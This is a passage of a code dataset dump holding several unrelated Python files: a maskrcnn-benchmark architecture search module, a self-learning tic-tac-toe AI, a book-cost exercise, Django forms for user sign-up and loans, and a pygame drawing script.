__init__(self, backbone_rngs, head_rngs, inter_rngs, cycle, \\\n\t\t\t\tpq=None, pq_thing=None, pq_stuff=None, sq=None, rq=None, \\\n\t\t\t\tap_box=None, ap_mask=None, fitness=None, fitness_key=\"pq\"):\n\t\tself.backbone_rngs = backbone_rngs\n\t\tself.head_rngs = head_rngs\n\t\tself.inter_rngs = inter_rngs\n\n\t\tself.backbone_layers = len(backbone_rngs) if backbone_rngs is not None else 0\n\t\tself.head_layers = len(head_rngs)\n\t\tself.inter_layers = len(inter_rngs)\n\n\t\tself.fitness = fitness\n\t\tself.pq = pq\n\t\tself.pq_thing = pq_thing\n\t\tself.pq_stuff = pq_stuff\n\t\tself.sq = sq\n\t\tself.rq = rq\n\t\tself.ap_box = ap_box\n\t\tself.ap_mask = ap_mask\n\t\tself.cycle = cycle\n\n\t\tself.fitness_key = fitness_key\n\n\tdef set_fitness(self, fitness):\n\t\tself.fitness = float(fitness)\n\n\tdef set(self, pq, pq_thing, pq_stuff, sq, rq, ap_box, ap_mask):\n\t\tself.pq = pq\n\t\tself.pq_thing = pq_thing\n\t\tself.pq_stuff = pq_stuff\n\t\tself.sq = sq\n\t\tself.rq = rq\n\t\tself.ap_box = ap_box\n\t\tself.ap_mask = ap_mask\n\n\t@staticmethod\n\tdef reload(l, fitness_key=\"pq\"):\n\t\tassert isinstance(l, dict)\n\t\tloaded_model = TEST_MODEL(l[\"backbone_rngs\"], l['head_rngs'], l['inter_rngs'], l['cycle'])\n\t\tloaded_model.set(l['pq'], l['pq_thing'], l['pq_stuff'], l['sq'], l['rq'], l['ap_box'], l['ap_mask'])\n\t\tloaded_model.set_fitness(l[fitness_key])\n\t\treturn loaded_model\n\n\tdef __repr__(self):\n\t\tinfo = \"TEST_MODEL: [backbone_rngs:{}, head_rngs:{}, inter_rngs:{}, cycle:{}\".format(self.backbone_rngs, self.head_rngs, self.inter_rngs, self.cycle)\n\t\tif self.pq is not None:\n\t\t\tinfo += \", pq:{}, pq_thing:{}, pq_stuff:{}, sq:{}, rq:{}, ap_box:{}, ap_mask:{}]\".format(\n\t\t\t\tself.pq, self.pq_thing, self.pq_stuff, self.sq, self.rq, self.ap_box, self.ap_mask)\n\t\telse:\n\t\t\tinfo += \"]\"\n\t\treturn info\n\n\tdef encode(self): # for broadcast\n\t\tenc = []\n\t\tif self.backbone_rngs is not None:\n\t\t\tenc.extend(self.backbone_rngs)\n\t\tenc.extend(self.head_rngs)\n\t\tenc.extend(self.inter_rngs)\n\t\tenc.append(self.cycle)\n\t\treturn torch.Tensor(enc)\n\n\tdef tolist(self):\n\t\tl = []\n\t\tif self.backbone_rngs is not None:\n\t\t\tl.extend(self.backbone_rngs)\n\t\tl.extend(self.head_rngs)\n\t\tl.extend(self.inter_rngs)\n\t\treturn l, self.cycle\n\n\t@staticmethod\n\tdef fromlist(l, 
split):\n\t\tassert isinstance(split, list)\n\t\tfor i in range(1, len(split)):\n\t\t\tsplit[i] += split[i-1]\n\t\ttemp = np.split(l, split)\n\t\tmap(lambda x: x.tolist(), temp)\n\t\tassert len(temp[-1]) == 1\n\t\ttemp[-1] = temp[-1][0]\n\t\tif len(split) < 3: # no backbone search\n\t\t\ttemp.insert(0, [])\n\t\treturn temp\n\n\tdef info(self):\n\t\tdef serialize(_input):\n\t\t\tif not isinstance(_input, list):\n\t\t\t\t_input = _input.tolist()\n\t\t\tfor i in range(len(_input)):\n\t\t\t\t_input[i] = int(_input[i])\n\t\t\treturn _input\n\t\tbackbone_rngs = serialize(self.backbone_rngs)\n\t\thead_rngs = serialize(self.head_rngs)\n\t\tinter_rngs = serialize(self.inter_rngs)\n\t\treturn dict(\n\t\t\t\t{\n\t\t\t\t\t'cycle': int(self.cycle),\n\t\t\t\t\t'backbone_rngs': backbone_rngs,\n\t\t\t\t\t'head_rngs': head_rngs,\n\t\t\t\t\t'inter_rngs': inter_rngs,\n\t\t\t\t\t'pq': float(self.pq),\n\t\t\t\t\t'pq_thing': float(self.pq_thing),\n\t\t\t\t\t'pq_stuff': float(self.pq_stuff),\n\t\t\t\t\t'sq': float(self.sq),\n\t\t\t\t\t'rq': float(self.rq),\n\t\t\t\t\t'ap_box': float(self.ap_box),\n\t\t\t\t\t'ap_mask': float(self.ap_mask),\n\t\t\t\t\t'fitness': float(self.fitness)\n\t\t\t\t}\n\t\t\t )\n\nclass PathPrioritySearch(object):\n\t'''\n\t\tDistributed Path Priority Search \n\t'''\n\tdef __init__(self, cfg, base_dir, topk=5, ckp=\"cache_test_log.json\"):\n\t\tself.cfg = cfg.clone()\n\t\tself.ckp = ckp\n\t\tself.topk = topk\n\t\tself.base_dir = base_dir\n\t\tif not os.path.exists(base_dir):\n\t\t\tos.mkdir(base_dir)\n\n\t\tself.num_cycle = self.cfg.NAS.TEST_CYCLE\n\n\t\tself.backbone_layers = sum(self.cfg.MODEL.BACKBONE.STAGE_REPEATS)\n\t\tif self.cfg.MODEL.SEG_BRANCH.SHARE_SUBNET:\n\t\t\tself.head_layers = len(cfg.MODEL.ROI_MASK_HEAD.CONV_LAYERS) + cfg.MODEL.SEG_BRANCH.SUBNET_DEPTH\n\t\telse:\n\t\t\tself.head_layers = len(cfg.MODEL.ROI_MASK_HEAD.CONV_LAYERS) + 4 * cfg.MODEL.SEG_BRANCH.SUBNET_DEPTH\n\t\tself.inter_layers = 9\n\n\t\tself.backbone_ss_size = len(blocks_key)\n\t\tself.head_ss_size = len(head_ss_keys)\n\t\tself.inter_ss_size = len(inter_ss_keys)\n\n\t\tif 'search' in cfg.MODEL.BACKBONE.CONV_BODY:\n\t\t\t_lcm = self.backbone_ss_size*self.head_ss_size//math.gcd(self.backbone_ss_size,self.head_ss_size)\n\t\t\tself.lcm = self.inter_ss_size*_lcm//math.gcd(self.inter_ss_size, _lcm)\n\t\t\tself.search_backbone = True\n\t\telse:\n\t\t\tself.lcm = self.inter_ss_size*self.head_ss_size//math.gcd(self.inter_ss_size, self.head_ss_size)\n\t\t\tself.search_backbone = False\n\n\t\tself.cache_model_list = None # type: list[TEST_MODEL]\n\t\tself.exist_cycle = -1\n\t\tself.new_model_list = None # type: list[TEST_MODEL]\n\n\t\tself.backbone_sb = np.zeros((self.backbone_ss_size, self.backbone_layers), dtype=np.int)\n\t\tself.head_sb = np.zeros((self.head_ss_size, self.head_layers), dtype=np.int)\n\t\tself.inter_sb = np.zeros((self.inter_ss_size, self.inter_layers), dtype=np.int)\n\n\t\tself.rank = get_rank()\n\t\tself.world_size = get_world_size()\n\n\n\tdef generate_fair_test(self): # load cache model and generate new models to test\n\t\tcache_f = self.load_checkpoint()\n\t\tcache_model_list = []\n\t\tnew_model_list = []\n\t\t\n\t\texist_cycle = -1\n\t\t# load evluated results\n\t\tif cache_f is not None:\n\t\t\tprint('length of cache:', len(cache_f))\n\t\t\texist_cycle = len(cache_f) // self.lcm\n\t\t\tprint('existing cycles:', exist_cycle)\n\t\t\tcache_f = cache_f[0: self.lcm * exist_cycle]\n\t\t\tfor m in cache_f:\n\t\t\t\t# t = TEST_MODEL(m['backbone_rngs'], m['head_rngs'], m['inter_rngs'], 
m['cycle'])\n\t\t\t\t# t.set(m['pq'], m['pq_thing'], m['pq_stuff'], m['sq'], m['rq'], m['ap_box'], m['ap_mask'])\n\t\t\t\t# t.set_fitness(m['pq'])\n\t\t\t\tt = TEST_MODEL(m.get('backbone_rngs'), m.get('head_rngs'), m.get('inter_rngs'), m.get('cycle'))\n\t\t\t\tt.set(m.get('pq'), m.get('pq_thing'), m.get('pq_stuff'), m.get('sq'), m.get('rq'), m.get('ap_box'), m.get('ap_mask'))\n\t\t\t\tt.set_fitness(m.get('pq'))\n\t\t\t\tcache_model_list.append(t)\n\t\t\tprint('Loaded cache models:', cache_model_list)\n\t\telse:\n\t\t\texist_cycle = 0\n\n\t\t# generate new models to evaluate\n\t\tnew_model_enc = None\n\t\t\n\t\tfor c in range(exist_cycle, self.num_cycle):\n\t\t\tif self.search_backbone:\n\t\t\t\tbackbone_rngs = generate_rng(self.backbone_layers, self.backbone_ss_size, self.lcm).transpose(1, 0)\n\t\t\thead_rngs = generate_rng(self.head_layers, self.head_ss_size, self.lcm).transpose(1, 0)\n\t\t\tinter_rngs = generate_rng(self.inter_layers, self.inter_ss_size, self.lcm).transpose(1, 0)\n\t\t\t# rngs = np.concatenate([backbone_rngs, head_rngs, inter_rngs], axis=0).transpose(1, 0)\n\t\t\t\n\t\t\tfor i in range(len(head_rngs)):\n\t\t\t\tif self.search_backbone:\n\t\t\t\t\tnew_model_list.append(TEST_MODEL(backbone_rngs[i], head_rngs[i], inter_rngs[i], c))\n\t\t\t\telse:\n\t\t\t\t\tnew_model_list.append(TEST_MODEL(None, head_rngs[i], inter_rngs[i], c))\n\t\t# if self.rank == 0:\n\t\t# \tprint('rank 0:', new_model_list)\n\n\t\tif exist_cycle < self.num_cycle: \n\t\t\tnew_model_enc = torch.stack([m.encode() for m in new_model_list]).cuda().detach()\n\t\t\t\t\n\t\t\tif self.world_size > 1:\n\t\t\t\tdist.broadcast(new_model_enc, 0)\n\t\t\tnew_model_list = new_model_enc.cpu().numpy().astype(np.int).tolist()\n\t\t\t# convert list to TEST_MODEL\n\t\t\tfor i in range(len(new_model_list)):\n\t\t\t\tif self.search_backbone:\n\t\t\t\t\ttemp = TEST_MODEL.fromlist(new_model_list[i], [self.backbone_layers, self.head_layers, self.inter_layers])\n\t\t\t\telse:\n\t\t\t\t\ttemp = TEST_MODEL.fromlist(new_model_list[i], [self.head_layers, self.inter_layers])\n\t\t\t\tnew_model_list[i] = TEST_MODEL(*temp)\n\t\t# if self.rank == 1:\n\t\t# \tprint('Receive:', new_model_list)\n\n\t\tassert(len(cache_model_list) == self.lcm * exist_cycle), \"len(cache_model_list)={}, lcm * exist_cycle={}, cache_model_list:{}\".format(len(cache_model_list), self.lcm * exist_cycle, cache_model_list)\n\t\tself.cache_model_list = cache_model_list\n\t\tself.new_model_list = new_model_list\n\t\tself.exist_cycle = exist_cycle\n\n\n\tdef score_cycle_model(self, cycle_models, verbose=True):\n\t\tif self.rank == 0: # only rank 0 has results to score\n\t\t\tassert len(cycle_models) == self.lcm, 'models missing in some cycle'\n\t\t\tassert len(set([m.cycle for m in cycle_models])) == 1, 'models are not in a same cycle:\\n{}'.format(cycle_models)\n\t\t\tcur_score = self.lcm - 1\n\t\t\tmodel_list = sorted(cycle_models, key=lambda item: item.fitness, reverse=True)\n\t\t\tfor model in model_list:\n\t\t\t\tif self.search_backbone:\n\t\t\t\t\tself.backbone_sb[model.backbone_rngs, np.arange(self.backbone_layers)] += cur_score\n\t\t\t\tself.head_sb[model.head_rngs, np.arange(self.head_layers)] += cur_score\n\t\t\t\tself.inter_sb[model.inter_rngs, np.arange(self.inter_layers)] += cur_score\n\t\t\t\tcur_score -= 1\n\t\t\tif verbose:\n\t\t\t\tself.myprint('='*15, ' Scoreboard ', '='*15)\n\t\t\t\tself.myprint('backbone:', self.backbone_sb)\n\t\t\t\tself.myprint('head:', self.head_sb)\n\t\t\t\tself.myprint('inter:', self.inter_sb)\n\n\n\tdef save_checkpoint(self, 
file_name):\n\t\tif self.rank == 0:\n\t\t\toutput = []\n\t\t\tfn = os.path.join(self.base_dir, file_name)\n\t\t\tfor m in self.cache_model_list:\n\t\t\t\toutput.append(m.info())\n\t\t\tprint(\"Saving checkpoint to {}\".format(fn))\n\t\t\twith open(fn, 'w') as f:\n\t\t\t\tjson.dump(output, f)\n\t\t\tsb = {}\n\t\t\tif self.search_backbone:\n\t\t\t\tsb['backbone_sb'] = self.backbone_sb.tolist()\n\t\t\tsb['head_sb'] = self.head_sb.tolist()\n\t\t\tsb['inter_sb'] = self.inter_sb.tolist()\n\t\t\tsb_fn = fn.rstrip('.json') + '_scoreboard.json'\n\t\t\tprint(\"Saving scoreboard to {}\".format(sb_fn))\n\t\t\twith open(sb_fn, 'w') as f:\n\t\t\t\tjson.dump(sb, f)\n\n\n\tdef load_checkpoint(self):\n\t\tcache_f = None\n\t\tckp_fn = os.path.join(self.base_dir, self.ckp)\n\t\tif os.path.exists(ckp_fn):\n\t\t\tprint(\"Using (part of) cached test results from {}\".format(ckp_fn))\n\t\t\tcache_f = json.load(open(ckp_fn, 'r'))\n\t\treturn cache_f\n\n\n\tdef save_topk(self):\n\t\tif self.rank == 0:\n\t\t\td = 'top{}_cycle{}_{}'.format(self.topk, self.num_cycle, datetime.fromtimestamp(time.time()).strftime('%Y%m%d-%H:%M'))\n\t\t\tsave_dir = os.path.join(self.base_dir, d)\n\t\t\tif not os.path.exists(save_dir):\n\t\t\t\tos.mkdir(save_dir)\n\t\t\t# reverse argsort\n\t\t\tif self.search_backbone:\n\t\t\t\tbackbone_topk = np.argsort(self.backbone_sb, axis=0)[-self.topk:][::-1].tolist()\n\t\t\thead_topk = np.argsort(self.head_sb, axis=0)[-self.topk:][::-1].tolist()\n\t\t\tinter_topk = np.argsort(self.inter_sb, axis=0)[-self.topk:][::-1].tolist()\n\t\t\tdef get_min(*a):\n\t\t\t ans = a[0]\n\t\t\t for item in a:\n\t\t\t ans = min(ans, item)\n\t\t\t return ans\n\t\t\tif self.search_backbone:\n\t\t\t\t_min = get_min(self.topk, self.backbone_ss_size, self.head_ss_size, self.inter_ss_size)\n\t\t\telse:\n\t\t\t\t_min = get_min(self.topk, self.head_ss_size, self.inter_ss_size)\n\t\t\tfor i in range(_min):\n\t\t\t\twith open(os.path.join(save_dir, 'model_{}'.format(i)), 'w') as f:\n\t\t\t\t\tprint('***'*10)\n\t\t\t\t\tprint('Saving model_{}'.format(i))\n\t\t\t\t\tif self.search_backbone:\n\t\t\t\t\t\tprint('backbone:', backbone_topk[i])\n\t\t\t\t\tprint('head:', head_topk[i])\n\t\t\t\t\tprint('inter:', inter_topk[i])\n\t\t\t\t\tif self.search_backbone:\n\t\t\t\t\t\tjson.dump(\n\t\t\t\t\t\t\t[{\n\t\t\t\t\t\t\t\t'backbone': backbone_topk[i],\n\t\t\t\t\t\t\t\t'head': head_topk[i],\n\t\t\t\t\t\t\t\t'inter': inter_topk[i],\n\t\t\t\t\t\t\t}], f\n\t\t\t\t\t\t)\n\t\t\t\t\telse:\n\t\t\t\t\t\tjson.dump(\n\t\t\t\t\t\t\t[{\n\t\t\t\t\t\t\t\t'head': head_topk[i],\n\t\t\t\t\t\t\t\t'inter': inter_topk[i],\n\t\t\t\t\t\t\t}], f\n\t\t\t\t\t\t)\n\n\n\tdef _evaluate(self, model, model_cfg, data_loaders, output_folders, dataset_names):\t\t\n\t\tiou_types = (\"bbox\",)\n\t\tif self.cfg.MODEL.MASK_ON:\n\t\t\tiou_types = iou_types + (\"segm\",)\n\t\trngs, _ = model_cfg.tolist()\n\t\tfor output_folder, dataset_name, data_loader in zip(output_folders, dataset_names, data_loaders):\n\t\t\ttemp = 
inference(\n\t\t\t\t\t\t\tmodel,\n\t\t\t\t\t\t\tdata_loader,\n\t\t\t\t\t\t\tdataset_name=dataset_name,\n\t\t\t\t\t\t\tiou_types=iou_types,\n\t\t\t\t\t\t\tbox_only=self.cfg.MODEL.RPN_ONLY,\n\t\t\t\t\t\t\tdevice=self.cfg.MODEL.DEVICE,\n\t\t\t\t\t\t\texpected_results=self.cfg.TEST.EXPECTED_RESULTS,\n\t\t\t\t\t\t\texpected_results_sigma_tol=self.cfg.TEST.EXPECTED_RESULTS_SIGMA_TOL,\n\t\t\t\t\t\t\toutput_folder=output_folder,\n\t\t\t\t\t\t\tc2d_json_path=self.cfg.MODEL.SEG_BRANCH.JSON_PATH,\n\t\t\t\t\t\t\trngs=rngs,\n\t\t\t\t\t\t\tcfg=self.cfg,\n\t\t\t\t\t\t)\n\t\t\tsynchronize()\n\n\t\t\tdef _list2str(lst):\n\t\t\t\treturn \"\".join(map(lambda x: str(x), lst))\n\n\t\t\tdef _parse(f):\n\t\t\t\t# return int(np.random.randint(0, 100)), 0, 0, 0, 0\n\t\t\t\tif isinstance(f, str):\n\t\t\t\t\tf = open(f, 'r')\n\t\t\t\tfor line in f.readlines():\n\t\t\t\t\tif line.startswith(\"All\"):\n\t\t\t\t\t\td = line.split()\n\t\t\t\t\t\tpq, sq, rq = float(d[2]), float(d[3]), float(d[4])\n\t\t\t\t\telif line.startswith(\"Things\"):\n\t\t\t\t\t\tpq_thing = float(line.split()[2])\n\t\t\t\t\telif line.startswith(\"Stuff\"):\n\t\t\t\t\t\tpq_stuff = float(line.split()[2])\n\t\t\t\tf.close()\n\t\t\t\treturn pq, pq_thing, pq_stuff, sq, rq\n\n\t\t\tif self.rank == 0:\n\t\t\t\tresults, _ = temp\n\t\t\t\tout_dir = os.path.join(self.base_dir, 'test_model_log')\n\t\t\t\tif not os.path.exists(out_dir):\n\t\t\t\t\tos.mkdir(out_dir)\n\t\t\t\tout_file = '{}/test_model_result_{}'.format(out_dir, _list2str(model_cfg.tolist()[0]))\n\t\t\t\tif 'ade' in self.cfg.DATASETS.NAME.lower():\n\t\t\t\t\tprint('Evaluating panoptic results on ADE...')\n\t\t\t\t\tos.system('sh bash_ade_evaluate.sh | tee {}'.format(out_file))\n\t\t\t\telif 'coco' in self.cfg.DATASETS.NAME.lower():\n\t\t\t\t\tprint('Evaluating panoptic results on COCO...')\n\t\t\t\t\tos.system('sh panoptic_scripts/bash_coco_nas_val_evaluate.sh {} | tee {}'.format(self.cfg.OUTPUT_DIR, out_file))\n\t\t\t\telse:\n\t\t\t\t\traise NotImplementedError\n\t\t\t\tap_box = round(results.results['bbox']['AP'] * 100, 2)\n\t\t\t\tap_mask = round(results.results['segm']['AP'] * 100, 2)\n\t\t\t\tpq, pq_thing, pq_stuff, sq, rq = _parse(out_file)\n\t\t\t\tmodel_cfg.set(pq, pq_thing, pq_stuff, sq, rq, ap_box=ap_box, ap_mask=ap_mask)\n\t\t\t\tmodel_cfg.set_fitness(pq)\n\t\t\tsynchronize() \n\t\treturn model_cfg\n\n\tdef myprint(self, *s):\n\t\tif self.rank == 0:\n\t\t\tprint(*s)\n\n\tdef search(self, model, output_folders, dataset_names, distributed):\n\t\tself.myprint('[x]: Begin path priority search...')\n\t\tmodel.eval()\n\t\tif self.exist_cycle >= self.num_cycle: # cached results are enough\n\t\t\tself.myprint('[x]: Using cached model results')\n\t\t\tfor i in range(self.num_cycle):\n\t\t\t\tmodels_this_cycle = self.cache_model_list[i*self.lcm : (i+1)*self.lcm]\n\t\t\t\tself.score_cycle_model(models_this_cycle)\n\t\telse:\n\t\t\tfor i in range(self.exist_cycle, self.num_cycle):\n\t\t\t\tmodels_this_cycle = self.new_model_list[i*self.lcm : (i+1)*self.lcm]\n\t\t\t\tfor i in range(len(models_this_cycle)):\n\t\t\t\t\tdataloaders_nas_val = make_data_loader(self.cfg, is_train=False, is_distributed=distributed)\n\t\t\t\t\tmodel_cfg = models_this_cycle[i]\n\t\t\t\t\tself.myprint('[x]: Evaluating model {}'.format(model_cfg))\n\t\t\t\t\tmodel_cfg = self._evaluate(model, model_cfg, dataloaders_nas_val, output_folders, dataset_names)\n\t\t\t\t\tself.myprint('[x]: Evaluation complete, saving checkpoint...')\n\t\t\t\t\tself.cache_model_list.append(model_cfg)\n\t\t\t\t\tself.myprint('[x]: Cached: ', 
self.cache_model_list)\n\t\t\t\t\tmodels_this_cycle[i] = model_cfg\n\t\t\t\t\tself.save_checkpoint(self.ckp)\n\t\t\t\tself.score_cycle_model(models_this_cycle)\n\n\t\tself.myprint('[x]: Searching complete, saving...')\n\t\tself.save_checkpoint(\"final_test_log.json\")\n\n","sub_path":"maskrcnn-benchmark/maskrcnn_benchmark/engine/architecture_search.py","file_name":"architecture_search.py","file_ext":"py","file_size_in_byte":15258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"617958169","text":"import sys\nimport os\nimport random\nimport copy\n\nclass AI:\n def __init__(self, name, playerType, random=False, smart=False):\n self.name = name\n self.playerType = playerType\n self.turn = 0\n self.random = random\n self.smart = smart\n self.currentTurns = [] # store moves of the current game\n self.turnData = {} #{'key': [[[0,0,0],[0,0,0],[0,0,0]], 0]} #index 0 stores perecentage win rate of each position at the scenario 'key', index 1 stores total amount of turns taken at this scenario\n self.keys = {'1': (0,0), '2': (1,0), '3': (2,0), '4': (0,1), '5': (1,1), '6': (2,1), '7': (0,2), '8': (1,2), '9': (2,2)}\n \n def saveTurnData(self):\n def toStr(turnData):\n data = ''\n for row in turnData[0]:\n for elem in row:\n data += str(elem) + ','\n data += str(turnData[1]) \n return data\n \n file = open(self.name + '_turnData.txt','w')\n for key in self.turnData:\n file.write(key)\n file.write(',')\n file.write(toStr(self.turnData[key]))\n file.write('\\n')\n file.close() \n \n def getTurnData(self):\n def makeArray(data):\n output = []\n temp = []\n for elem in data:\n if elem not in ['X','O','_']:\n temp.append(int(elem))\n else:\n temp.append(elem)\n if len(temp) == 3:\n output.append(temp)\n temp = []\n \n return output\n fName = self.name +'_turnData.txt'\n if os.path.exists(fName):\n file = open(fName,'r')\n data = {}\n for elem in file.readlines():\n elem_array = elem.strip('\\n').split(',')\n key = elem_array[0]\n data[key] = [makeArray(elem_array[1:-1]), int(elem_array[-1])]\n \n self.turnData = data\n\n def boardToKey(self, board):\n key = ''\n for row in board:\n for elem in row:\n key+=elem\n return key\n \n def getRandomTurn(self, board):\n history = {}\n x = random.randint(0,2)\n y = random.randint(0,2)\n history[(x,y)] = True\n while history.get((x,y)) and board[y][x] in ['X', 'O']:\n x = random.randint(0,2)\n y = random.randint(0,2)\n history[(x,y)] = True\n return (x,y)\n \n def getWinningMove(self, board, player):\n def checkRow(rowNum, playerType):\n count = 0\n for column in range(3):\n if board[rowNum][column] == playerType:\n count += 1\n elif board[rowNum][column] != '_':\n count -= 1\n else:\n target = column\n if count == 2:\n return (target, rowNum)\n return False\n \n def checkRows(playerType):\n for row in range(3):\n result = checkRow(row,playerType)\n if result != False:\n return result\n return False\n \n def checkColumn(columnNum,playerType):\n count=0\n for row in range(3):\n if board[row][columnNum] == playerType:\n count += 1\n elif board[row][columnNum] != '_':\n count -= 1\n else:\n target = row\n if count == 2:\n return (columnNum, target)\n return False\n\n def checkColumns(playerType):\n for column in range(3):\n result = checkColumn(column,playerType)\n if result != False:\n return result\n return False\n \n def checkDiagonal(playerType):\n def helper(direction, playerType):\n if direction == 'left':\n column = 0\n else:\n column = 2\n count = 0\n for row in range(3):\n if board[row][column] == 
playerType:\n count += 1\n elif board[row][column] != '_':\n count -= 1\n else:\n targetPosition = (column, row)\n if direction == 'left':\n column += 1\n else:\n column -= 1\n if count == 2:\n return targetPosition\n return False\n result = helper('left', playerType)\n if not result:\n return helper('right', playerType)\n else:\n return result\n \n #make winning move if it exists\n wm_row = checkRows(player)\n if wm_row != False:\n return wm_row\n \n wm_column = checkColumns(player)\n if wm_column != False:\n return wm_column\n\n wm_diagonals = checkDiagonal(player)\n if wm_diagonals != False:\n return wm_diagonals\n \n #block other players winning move\n if player == 'X':\n playerType = 'O'\n else:\n playerType = 'X'\n \n wm_row = checkRows(playerType)\n if wm_row != False:\n return wm_row\n \n wm_column = checkColumns(playerType)\n if wm_column != False:\n return wm_column\n\n return checkDiagonal(playerType)\n\n def getSmartTurn(self,board):\n #these moves should be weighted in terms of success\n def getCornerMove(index):\n #move on corner\n if index == 0 and board[0][0] == '_':\n return (0,0)\n if index == 1 and board[0][2] == '_':\n return (2,0)\n if index == 2 and board[2][0] == '_':\n return (0,2)\n if index == 3 and board[2][2] == '_':\n return (2,2)\n return False\n \n cornerMove = getCornerMove(random.randint(0, 3))\n if cornerMove != False:\n return cornerMove\n\n #move on center\n if board[1][1] == '_':\n return (1,1)\n\n \n #move on side\n def getSideMove(index):\n if index == 0 and board[0][1] == '_':\n return (1,0)\n if index == 1 and board[1][0] == '_':\n return (0,1)\n if index == 2 and board[2][1] == '_':\n return (1,2)\n if index == 3 and board[1][2] == '_':\n return (2,1)\n return False\n\n sideMove = getSideMove(random.randint(0, 3))\n if sideMove != False:\n return sideMove\n \n def getTurn(self, board):\n \n if self.random:\n return self.getRandomTurn(board)\n \n winningMove = self.getWinningMove(board,self.playerType)\n if winningMove != False:\n return winningMove\n \n currentMax = -sys.maxsize\n key = self.boardToKey(board)\n if self.turnData.get(key):\n for y in range(len(self.turnData[key][0])):\n for x in range(len(self.turnData[key][0][y])):\n if isinstance(self.turnData[key][0][y][x],int) and self.turnData[key][0][y][x] > currentMax:\n currentMax = self.turnData[key][0][y][x]\n max_index = (x,y)\n if currentMax != -sys.maxsize and currentMax != 0:\n print('percentage move')\n return max_index\n else:\n print('programmed move')\n return self.getSmartTurn(board)\n \n def takeTurn(self, board, position):\n self.currentTurns.append({'board': copy.deepcopy(board), 'position':position})\n\n def makeTurn(self, board):\n position = self.getTurn(board)\n self.takeTurn(board, position)\n return position\n\n def convertBoard(self, board):\n output = copy.deepcopy(board)\n for y in range(len(output)):\n for x in range(len(output[y])):\n if output[y][x] == '_':\n output[y][x] = 0\n return output\n \n def updateTurnData(self, status):\n \n for turn in self.currentTurns:\n key = self.boardToKey(turn['board'])\n x = turn['position'][0]\n y = turn['position'][1]\n if not self.turnData.get(key):\n self.turnData[key] = [self.convertBoard(turn['board']), 1]\n #print(self.turnData[key][0])\n if status == 'win' or status == 'tie':\n #print('update win data')\n self.turnData[key][0][y][x] += 1 # increment total wins from this position\n else:\n #print('update losing data')\n if self.turnData[key][0][y][x] > 0:\n self.turnData[key][0][y][x] -= 1 # decrement total wins from this 
position\n        self.turnData[key][1] += 1 # update total amount of turns at this scenario\n        self.currentTurns = []\n        \n        \n        \n        \n        \n        \n        \n        \n        \n","sub_path":"ai.py","file_name":"ai.py","file_ext":"py","file_size_in_byte":9280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"85682866","text":"#Think Python Exercise 2.4 number 2\n#Find the total wholesale cost of 60 books\n#Cover price is $24.95, bookstore price is 40% discount\n#Shipping is $3 for first copy and $0.75 for each additional copy\n\nprint('How many books?')\nquantity = int(input())\n\nsale = 24.95\nwholesaleEach = sale * 0.60 # bookstore pays the cover price less the 40% discount\nsubtotal = quantity * wholesaleEach\nprint('Subtotal = ' + str(subtotal))\n\nshipping = 3.00 + (quantity - 1)*0.75\n\ntotal = subtotal + shipping\n\nprint('Shipping will be ' + str(shipping) + '.')\n\nprint('Total will be ' + str(total) + '.')\n\n\n","sub_path":"Chapter02/ThinkPythonEx2.4.2.py","file_name":"ThinkPythonEx2.4.2.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"319198216","text":"from django import forms\nfrom django.contrib.auth.forms import UserCreationForm\nfrom django.contrib.auth.models import User\nfrom .models import Loan\n\n\nclass NewUserForm(UserCreationForm):\n    email = forms.EmailField(required=True)\n\n    class Meta:\n        model = User\n        fields = (\"username\", \"email\", \"password1\", \"password2\")\n\n    def save(self, commit=True):\n        user = super(NewUserForm, self).save(commit=False)\n        user.email = self.cleaned_data[\"email\"]\n        if commit:\n            user.save()\n        return user\n    \nclass PostForm(forms.ModelForm):\n    class Meta:\n        model = Loan\n        fields = [\n            \"title\",\n            \"reason\",\n            \"amount\",\n            \"gurrantor_1\",\n            \"gurrantor_1_ID\",\n            \"gurrantor_2\",\n            \"gurrantor_2_ID\",\n        ] ","sub_path":"client/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"519816279","text":"import pygame\nfrom pygame.draw import *\nfrom random import *\nfrom numpy import *\n\npygame.init()\n\nFPS = 30\nscreen = pygame.display.set_mode((1200, 750))\n\ndef house(x, y, size):\n    w = 100 * size\n    rect(screen, (0, 0, 0), (int(x), int(y + w), int(w), int(w)), 2)\n    rect(screen, (91, 58, 41), (int(x + 2), int(y + w) + 2, int(w - 2), int(w - 2)), 0)\n    rect(screen, (122, 217, 255), (int(x + w/4), int(y + 5*w/4), int(w / 2), int(w / 2)), 0)\n    rect(screen, (204, 119, 34), (int(x + w/4) - 2, int(y + 5*w/4) - 2, int(w / 2) + 2, int(w / 2) + 2), 2)\n    polygon(screen, (255, 0, 0), [(int(x), int(y + w)), (int(x + w/2), int(y + w/2)), (int(x + w), int(y + w))], 0)\n    polygon(screen, (0, 0, 0), [(int(x), int(y + w)), (int(x + w/2), int(y + w/2)), (int(x + w), int(y + w))], 3)\n    \ndef cloud(x, y, size):\n    w = 100 * size\n    r = w / 3\n    a = 1\n    while a <= 10:\n        xx = randint(int(x + r), int(x + 2*w - r))\n        yy = randint(int(y + r), int(y + w - r))\n        circle(screen, (255, 255, 255), (xx, yy), int(r), 0)\n        circle(screen, (0, 0, 0), (xx, yy), int(r), 1)\n        a += 1\n\ndef tree(x, y, size):\n    w = 100 * size\n    r = w / 3\n    rect(screen, (0, 0, 0), (int(x + 7*w/12), int(y + w), int(w / 6), int(w)), 0)\n    circle(screen, (0, 153, 0), (int(x + w/2), int(y + w)), int(r), 0)\n    circle(screen, (0, 0, 0), (int(x + w/2), int(y + w)), int(r), 2)\n    circle(screen, (0, 153, 0), (int(x + 5*w/6), int(y + w)), int(r), 0)\n    circle(screen, (0, 0, 0), (int(x + 5*w/6), int(y + w)), int(r), 2)\n    
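# (editorial aside, hypothetical sketch: each leaf below is a filled circle\n    #  plus an outline; a small helper such as\n    #      def leaf(cx, cy): circle(screen, (0, 153, 0), (cx, cy), int(r), 0); circle(screen, (0, 0, 0), (cx, cy), int(r), 2)\n    #  would remove the repetition; names here are illustrative only)\n    circle(screen, 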
